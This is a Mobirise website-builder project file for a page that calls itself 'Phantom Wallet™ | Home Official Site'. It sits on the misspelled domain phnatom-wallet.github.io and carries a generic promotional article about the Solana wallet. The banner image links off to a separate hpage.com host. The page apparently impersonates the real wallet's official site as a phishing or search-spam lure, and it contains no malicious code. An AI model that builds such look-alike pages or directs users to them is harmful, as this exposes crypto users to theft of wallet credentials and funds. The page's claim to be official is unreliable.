{
  "settings": {
    "name": "Site 2023-12-21 13:30",
    "currentPage": "index.html",
    "theme": {
      "name": "startm5",
      "title": "StartM5",
      "titlePreset": "StartM5",
      "styling": {
        "primaryColor": "#9fe870",
        "secondaryColor": "#ffd7ef",
        "successColor": "#3a341c",
        "infoColor": "#320707",
        "warningColor": "#a0e2e1",
        "dangerColor": "#ffea64",
        "mainFont": "Inter Tight",
        "display1Font": "Inter Tight",
        "display1Size": 5,
        "display2Font": "Inter Tight",
        "display2Size": 4,
        "display5Font": "Inter Tight",
        "display5Size": 2,
        "display7Font": "Inter Tight",
        "display7Size": 1.4,
        "display4Font": "Inter Tight",
        "display4Size": 1.4,
        "isRoundedImages": true,
        "isRoundedButtons": true,
        "isLargeButtons": true,
        "isGhostButtonBorder": true,
        "underlinedLinks": false,
        "isAnimatedOnScroll": false,
        "isScrollToTopButton": false
      }
    },
    "path": "@PROJECT_PATH@",
    "versionFirst": "5.9.8",
    "siteFonts": [],
    "robotsSwitcher": true,
    "robotsText": "User-agent: *\nDisallow: /cgi-bin\nSitemap: https://phnatom-wallet.github.io/sitemap.xml",
    "sitemapSwitcher": true,
    "siteUrl": "https://phnatom-wallet.github.io/",
    "sitemapSwitcherAuto": "on",
    "imageResize": true,
    "usedWebp": true,
    "favicon": false,
    "mbrsiteDomain": "alloganzqp",
    "cookiesAlert": false,
    "gdpr": false,
    "uniqCompNum": 2,
    "versionPublish": "5.9.8"
  },
  "pages": {
    "index.html": {
      "settings": {
        "main": true,
        "title": "Phantom Wallet™ | Home Official Site",
        "meta_descr": "Our multichain wallet helps you explore web3, use apps, and buy, store, and trade crypto and NFTs across Solana, Ethereum, and Polygon. It's ...",
        "header_custom": "",
        "footer_custom": "",
        "html_before": ""
      },
      "components": [
        {
          "alias": false,
          "_styles": {
            "background-color": "@bgColor",
            "padding-top": "(@paddingTop * 15px)",
            "padding-bottom": "(@paddingBottom * 15px)",
            "img": {
              "object-fit": "contain",
              "border-radius": "0 !important"
            }
          },
          "_name": "image04",
          "_sourceTheme": "startm5",
          "_customHTML": "<section data-bs-version=\"5.1\" class=\"image03\" group=\"Image & Video\">\n    <mbr-parameters>\n        <header>Size</header>\n        <input type=\"range\" inline title=\"Top\" name=\"paddingTop\" min=\"0\" max=\"10\" value=\"0\" step=\"1\">\n        <input type=\"range\" inline title=\"Bottom\" name=\"paddingBottom\" min=\"0\" max=\"10\" value=\"0\" step=\"1\">\n        <header>Show/Hide</header>\n        <input type=\"checkbox\" title=\"Caption\" name=\"showText\">\n        <header>Background</header>\n        <input type=\"color\" title=\"Color\" name=\"bgColor\" value=\"#ffffff\">\n    </mbr-parameters>\n\n    <div class=\"image-block m-auto\">\n        <a href=\"https://phantom-wallet.hpage.com\"><img src=\"@PROJECT_PATH@/assets/images/phantom-wallet.png\" alt=\"Phantom Wallet\"></a>\n        <div mbr-if=\"showText\">\n            <p class=\"mbr-text mt-4 pb-4 align-center mbr-fonts-style\" mbr-theme-style=\"display-7\" data-app-selector=\".mbr-text\">\n                Unlock your true path!\n            </p>\n        </div>\n    </div>\n</section>",
          "_cid": "tZ3HKx1CV3",
          "_protectedParams": [],
          "_global": false,
          "_once": false,
          "_params": {},
          "_anchor": "image04-0"
        },
        {
          "alias": false,
          "_styles": {
            "& when not (@fullScreen)": {
              "padding-top": "(@paddingTop * 1rem)",
              "padding-bottom": "(@paddingBottom * 1rem)"
            },
            "& when (@bg-type = \"color\")": {
              "background-color": "@bg-value"
            },
            "& when (@bg-type = \"image\")": {
              "background-image": "url(@bg-value)"
            },
            ".mbr-fallback-image.disabled": {
              "display": "none"
            },
            ".mbr-fallback-image": {
              "display": "block",
              "background-size": "cover",
              "background-position": "center center",
              "width": "100%",
              "height": "100%",
              "position": "absolute",
              "top": "0",
              "& when (@bg-type = 'video')": {
                "background-image": "url(@fallBackImage)"
              }
            },
            ".card-wrapper": {
              "background": "@wrapBgColor",
              "@media (max-width: 767px)": {
                "padding": "2rem 1.5rem"
              },
              "@media (min-width: 768px) and (max-width: 991px)": {
                "padding": "2.25rem"
              },
              "@media (min-width: 992px)": {
                "padding": "4rem"
              }
            },
            ".mbr-text, .mbr-section-btn": {
              "color": "#000000",
              "text-align": "left"
            },
            ".card-title, .card-box": {
              "text-align": "left",
              "color": "#000000"
            }
          },
          "_name": "article07",
          "_sourceTheme": "startm5",
          "_customHTML": "<section data-bs-version=\"5.1\" class=\"article07\" group=\"Article\" data-bg-video=\"{{bg.type == 'video' && bg.value.url}}\" mbr-class=\"{\n    'mbr-fullscreen': fullScreen,\n    'mbr-parallax-background': bg.parallax}\">\n  <mbr-parameters>\n    <header>Size</header>\n    <input type=\"checkbox\" title=\"Full Screen\" name=\"fullScreen\">\n    <input type=\"checkbox\" title=\"Full Width\" name=\"fullWidth\">\n    <input type=\"range\" inline title=\"Top\" name=\"paddingTop\" min=\"0\" max=\"10\" step=\"1\" value=\"5\">\n    <input type=\"range\" inline title=\"Bottom\" name=\"paddingBottom\" min=\"0\" max=\"10\" step=\"1\" value=\"5\">\n    <input type=\"range\" inline title=\"Content Width\" name=\"contentWidth\" min=\"8\" max=\"12\" step=\"1\" value=\"10\">\n    <header>Show/Hide</header>\n    <input type=\"checkbox\" title=\"Title\" name=\"showTitle\" checked>\n    <input type=\"checkbox\" title=\"Subtitle\" name=\"showSubtitle\" checked>\n    <input type=\"checkbox\" title=\"Text\" name=\"showText\" checked>\n    <input type=\"checkbox\" title=\"Buttons\" name=\"showButtons\">\n    <input type=\"color\" title=\"Wrap Bg\" name=\"wrapBgColor\" value=\"#ffffff\">\n    <header>Background</header>\n    <fieldset type=\"background\" name=\"bg\" parallax>\n      <input type=\"image\" title=\"Image\" value=\"../_images/background1.jpg\" parallax>\n      <input type=\"color\" title=\"Color\" value=\"#edefeb\" selected>\n      <input type=\"video\" title=\"Video\" value=\"https://vimeo.com/428046504\">\n    </fieldset>\n    <header condition=\"bg.type === 'video'\">Fallback Image</header>\n    <input type=\"image\" title=\"Fallback Image\" value=\"../_images/background1.jpg\" name=\"fallBackImage\" condition=\"bg.type === 'video'\">\n    <input type=\"checkbox\" title=\"Overlay\" name=\"overlay\" condition=\"bg.type !== 'color'\" checked>\n    <input type=\"color\" title=\"Overlay Color\" name=\"overlayColor\" value=\"#ffffff\" condition=\"overlay && bg.type !== 'color'\">\n    <input type=\"range\" inline title=\"Opacity\" name=\"overlayOpacity\" min=\"0\" max=\"1\" step=\"0.1\" value=\"0.3\" condition=\"overlay && bg.type !== 'color'\">\n  </mbr-parameters>\n\n  <div class=\"mbr-fallback-image disabled\" mbr-if=\"bg.type == 'video'\"></div>\n  <div class=\"mbr-overlay\" mbr-if=\"overlay && bg.type!== 'color'\" mbr-style=\"{'opacity': overlayOpacity, 'background-color': overlayColor}\"></div>\n  <div mbr-class=\"{'container': !fullWidth, 'container-fluid': fullWidth}\">\n    <div class=\"row justify-content-center\">\n      <div class=\"card col-md-12 col-lg-{{contentWidth}}\">\n        <div class=\"card-wrapper\">\n          <h3 class=\"card-title mbr-fonts-style mbr-white mt-3 mb-4\" mbr-theme-style=\"display-2\" mbr-if=\"showTitle\" data-app-selector=\".card-title, .card-box\"><b><a href=\"https://phnatom-wallet.github.io/\" class=\"text-primary\">Phantom Wallet</a>™ | Home Official Site</b></h3>\n          <div class=\"row card-box align-left\">\n            \n            \n            \n            <div class=\"item features-without-image col-12 active\">\n              <div class=\"item-wrapper\">\n                <h4 class=\"mbr-section-subtitle mbr-fonts-style mb-3\" mbr-if=\"showSubtitle\" data-app-selector=\".mbr-section-subtitle\" mbr-theme-style=\"display-5\"><b>Unveiling the Power of <a href=\"https://phantom.app/\" class=\"text-primary\">Phantom Wallet</a>: A Gateway to Seamless DeFi on Solana</b></h4>\n                <p class=\"mbr-text mbr-fonts-style\" mbr-theme-style=\"display-7\" mbr-if=\"showText\" data-app-selector=\".mbr-text, .mbr-section-btn\">In the rapidly expanding realm of decentralized finance (DeFi), one name has emerged as a beacon of innovation and user-centric design—Phantom Wallet. Specifically crafted for the Solana blockchain, Phantom Wallet has become synonymous with efficiency, security, and a seamless user experience. This article explores the key features, advantages, and the transformative impact of Phantom Wallet in the world of decentralized finance.\n<br>\n<br>Understanding Phantom Wallet:\n<br>\n<br>Phantom Wallet is a non-custodial cryptocurrency wallet designed to operate exclusively on the Solana blockchain. Launched with the vision of simplifying the user experience within the Solana ecosystem, Phantom has quickly gained traction for its user-friendly interface and robust features. As a non-custodial wallet, Phantom emphasizes user control, allowing individuals to manage their digital assets without relying on a third party.\n<br>\n<br>Key Features:\n<br>\n<br>User-Friendly Interface:\n<br>Phantom Wallet sets itself apart with a user-friendly interface that caters to both novices and experienced users. The clean and intuitive design ensures that interacting with the wallet, whether it's for managing assets or participating in decentralized applications (DApps), is a seamless experience.\n<br>\n<br>Seamless Integration with Solana DApps:\n<br>One of Phantom Wallet's standout features is its seamless integration with a wide array of Solana-based DApps. This integration allows users to access decentralized exchanges, yield farming platforms, and NFT (Non-Fungible Token) marketplaces directly from the wallet. Phantom's compatibility with numerous DApps eliminates the need for multiple applications, streamlining the user experience.\n<br>\n<br>Enhanced Security Measures:\n<br>Security is a paramount concern in the cryptocurrency space, and Phantom Wallet prioritizes the safety of users' assets. The wallet employs industry-standard security measures, including private key encryption and secure login methods, to ensure that users have full control over their digital assets while maintaining the highest level of security.\n<br>\n<br>Cross-Platform Compatibility:\n<br>Phantom Wallet's versatility extends to cross-platform compatibility. Users can seamlessly access their wallets from various devices, including desktops, laptops, and mobile devices. This flexibility enhances the accessibility of decentralized finance, allowing users to manage their assets wherever they are.\n<br>\n<br>Advantages of Phantom Wallet:\n<br>\n<br>Low Transaction Costs on Solana:\n<br>Solana, known for its high throughput and low transaction costs, aligns perfectly with Phantom Wallet's efficiency. Users benefit from significantly lower transaction fees compared to some other blockchain networks, making Phantom Wallet an attractive choice for those engaging in frequent transactions.\n<br>\n<br>Fast Transaction Speeds:\n<br>Leveraging the speed of the Solana blockchain, Phantom Wallet ensures rapid transaction confirmations. Users experience near-instantaneous transaction speeds, eliminating the delays commonly associated with slower blockchain networks.\n<br>\n<br>Community Support and Engagement:\n<br>Phantom Wallet has cultivated a vibrant and active community. The community not only contributes to the wallet's development through feedback but also fosters an environment where users can share insights, tips, and troubleshooting assistance. This sense of community support enhances the overall user experience.\n<br>\n<br>Open-Source Nature:\n<br>Phantom Wallet operates on an open-source framework, emphasizing transparency and collaboration. The open-source nature of the wallet allows developers to contribute to its improvement, fostering innovation and ensuring that the wallet evolves in tandem with the dynamic landscape of decentralized finance.\n<br>\n<br>The Impact of Phantom Wallet on DeFi:\n<br>\n<br>Mass Adoption of Solana-Based DApps:\n<br>Phantom Wallet plays a pivotal role in driving the mass adoption of decentralized applications on the Solana blockchain. The seamless integration with various DApps encourages users to explore and engage in decentralized finance activities, contributing to the growth of the Solana ecosystem.\n<br>\n<br>Elevating Solana's Ecosystem:\n<br>Phantom Wallet's exclusive integration with Solana contributes to the prominence and growth of the Solana blockchain. As users flock to the wallet for its efficiency and user-friendly features, the demand for Solana-based decentralized applications, projects, and tokens is likely to surge.\n<br>\n<br>Shaping the Future of User-Centric Wallets:\n<br>Phantom Wallet stands as a model for the future of cryptocurrency wallets. Its emphasis on user experience, security, and seamless integration with DApps sets a standard for wallets aspiring to provide a comprehensive and user-centric experience. As more users prioritize ease of use and accessibility, wallets with features similar to Phantom are likely to shape the landscape of decentralized finance.\n<br>\n<br>Fostering Innovation within Solana's Ecosystem:\n<br>By providing a user-friendly gateway to the Solana ecosystem, Phantom Wallet contributes to fostering innovation within the blockchain network. Developers are motivated to create innovative DApps, knowing that Phantom's user base is actively seeking new and exciting opportunities within the Solana blockchain.\n<br>\n<br>Conclusion:\n<br>\n<br>Phantom Wallet has emerged as a game-changer in the decentralized finance space, particularly within the Solana ecosystem. Its commitment to user-friendly design, seamless integration with Solana-based DApps, and emphasis on security positions Phantom Wallet as a key player in shaping the future of decentralized finance. As the crypto community continues to evolve, user-centric wallets like Phantom are likely to play a crucial role in driving mass adoption and innovation within the decentralized finance landscape. As a gateway to the Solana blockchain, Phantom Wallet not only simplifies the user experience but also contributes to the broader vision of a decentralized and accessible financial future.</p>\n              </div>\n            </div>\n          </div>\n          <div mbr-buttons mbr-theme-style=\"display-7\" class=\"mbr-section-btn\" mbr-if=\"showButtons\" data-toolbar=\"-mbrBtnMove\">\n            <a class=\"btn btn-primary\" href=\"https://mobiri.se\" data-app-placeholder=\"Type Text\">Start Now</a>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</section>",
          "_cid": "tZ3HLlajBO",
          "_anchor": "article07-1",
          "_protectedParams": [],
          "_global": false,
          "_once": false,
          "_params": {}
        }
      ]
    }
  }
}